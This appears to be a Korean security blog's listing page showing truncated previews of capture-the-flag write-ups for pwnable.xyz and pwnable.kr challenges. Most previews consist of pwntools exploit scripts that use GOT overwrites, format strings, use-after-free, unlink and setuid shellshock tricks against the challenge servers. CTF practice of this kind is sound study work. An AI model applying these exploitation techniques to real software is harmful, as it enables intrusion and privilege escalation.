'분류 전체보기' 카테고리의 글 목록 (27 Page)

pwnable.xyz - message

#!/bin/bash for i in {1..100} do output=$(timeout 5s python my_python_file.py) if [[ $output == *"FLAG{"*"}"* ]]; then flag=$(echo "$output" | grep -o "FLAG{[^}]*}") echo "FLAG FOUND: $flag" exit 0 else echo "FLAG NOT FOUND." fi done echo "FLAG NOT FOUND in 100 tries" from pwn import * p = remote("svc.pwnable.xyz", 30017) # p = process("./challenge") p.sendlineafter("Message: ", "minseo") cnry ..

security/포너블 - pwnable.xyz 2023.02.16

pwnable.xyz - iape

from pwn import * p = remote("svc.pwnable.xyz", 30014) # p = process("./challenge") # 0x408 byte 채워야하므로 시간절약 위해 맨처음에 최대한 읽어놓자 p.sendafter("> ", "1") p.sendafter("data: ", 'A'*127) while True: p.sendafter("> ", "2") tmp = p.recvuntil("chars: ") num = int(tmp[8:-8]) if num>=14: p.send("A"*8) break if num!=0: p.send("\x00") p.sendafter("> ", "3") p.recvuntil('A'*135) win_addr = u64(p.recvline()[:-1..

security/포너블 - pwnable.xyz 2023.02.15

pwnable.xyz - strcat

# exploit 1 (using OOB) from pwn import * p = remote("svc.pwnable.xyz", 30013) # p = process("./challenge") e = ELF("./challenge") p.recvuntil("Name: ") p.send('\x00') p.recvuntil("Desc: ") p.sendline("hahaha") for i in range(8): p.sendlineafter("> ", "1") p.recvuntil("Name: ") p.send("\x00") p.sendlineafter("> ", "1") p.sendlineafter("Name: ", 'A'*0x80+'\x30\x20\x60') # strlen@got p.sendlineaft..

security/포너블 - pwnable.xyz 2023.02.12

pwnable.xyz - J-U-M-P

from pwn import * p = remote("svc.pwnable.xyz", 30012) # p = process("./challenge") p.recvuntil("> ") p.send("3") main_rbp = int(p.recvline()[:-1], 16) - 0xf8 print(hex(main_rbp)) fake_rbp = (main_rbp+0x9)&0xff real_rbp = main_rbp&0xff p.recvuntil("> ") pay = '119'+' '*0x1d+chr(fake_rbp) # 0x77 = 119 p.send(pay) p.recvline() # Invalid p.recvuntil("> ") pay = '1'+' '*0x1f+chr(real_rbp) p.send(pay..

security/포너블 - pwnable.xyz 2023.02.12

pwnable.xyz - SUS

from pwn import * p = remote("svc.pwnable.xyz", 30011) # p = process("./challenge") e = ELF("./challenge") p.sendafter("> ", "1") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", "1234") p.sendafter("> ", "3") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", b'A'*0x10+p64(e.got['printf'])) # s에 printf_got 대입 p.sendafter("> ", "1") p.sendafter("Name: ", p64(e.symbols['win'])) # 바로 다음문장 pr..

security/포너블 - pwnable.xyz 2023.02.09

pwnable.xyz - fspoo

# exploit1 from pwn import * p = remote("svc.pwnable.xyz", 30010) # p = process("./challenge") e = ELF("./challenge") def edit_name(name): p.recvuntil("> ") p.sendline("1") # getchar()에서 버퍼 비우므로 개행문자까지 넘김 p.sendafter("Name: ", name) def prep_msg(): p.recvuntil("> ") p.sendline("2") # getchar()에서 버퍼 비우므로 개행문자까지 넘김 def choose(num): p.recvuntil("> ") p.sendline(str(num)) # 7byte(이모지+공백) + 25byte(us..

security/포너블 - pwnable.xyz 2023.02.09

pwnable.xyz - l33t-ness

from pwn import * p = remote("svc.pwnable.xyz", 30008) p.recvuntil("x: ") p.send("1336") p.recvuntil("y: ") p.send("4294967295") p.recvline() p.sendline("3 1431656211") p.recvline() p.sendline("1 1 1 3 3") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { setup(argc, argv, envp); puts("The l33t-ness level."); // 라운드 세 개 전부 통과 if ( (unsigned __int8)round_1() && (u..

security/포너블 - pwnable.xyz 2023.02.07

pwnable.kr - [Toddler's Bottle] unlink

from pwn import * s = ssh(user="unlink", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/unlink/unlink") p.recvuntil("leak: ") stkebp = int(p.recvline()[:-1], 16) + 0x14 print(hex(stkebp)) p.recvuntil("leak: ") heap_a = int(p.recvline()[:-1], 16) print(hex(heap_a)) p.recvline() ''' chunk a 활용 pay = p32(0x080484eb) + b'A'*0xc pay += p32(heap_a+0xc)+p32(stkebp-0x4) ..

security/포너블 - pwnable.kr 2023.02.06

pwnable.kr - [Toddler's Bottle] uaf

#-*- coding:utf-8 -*- from pwn import * # 원래 chunk에는 Woman(Man)+16 주소 / 나이 / 이름 들어있었음 # Woman(Man)+16 주소에는 give_shell 주소 / introduce 주소 순으로 들어있엇음 # 재할당된 chunk의 첫 8B에 Human(Woman, Man)+8 주소를 덮어쓴다면 # introduce() 함수 대신 give_shell() 함수를 실행할 것임! with open("ha", "w+") as f: f.write(p64(0x401548)+p64(0x401548)+p64(0x401548)) # 0x401568, 0x401588 argvs = ["" for i in range(3)] argvs[1] = "24" argvs[2] =..

security/포너블 - pwnable.kr 2023.02.06

pwnable.kr - [Toddler's Bottle] shellshock

#include int main(){ // RealUID, EffectiveUID, SavedSetUID = shellshock_pwn setresuid(getegid(), getegid(), getegid()); // RealGID, EffectiveGID, SavedSetGID = shellshock_pwn setresgid(getegid(), getegid(), getegid()); // 프로그램 안에서 또다른 프로그램(ex. system()) 실행하면 EUID가 아닌 RUID 권한으로 실행된다 system("/home/shellshock/bash -c 'echo shock_me'"); return 0; } -r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bas..

security/포너블 - pwnable.kr 2023.02.06

대충공부한거적어두는블로그

분류 전체보기 299

티스토리툴바

« 2024/10 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31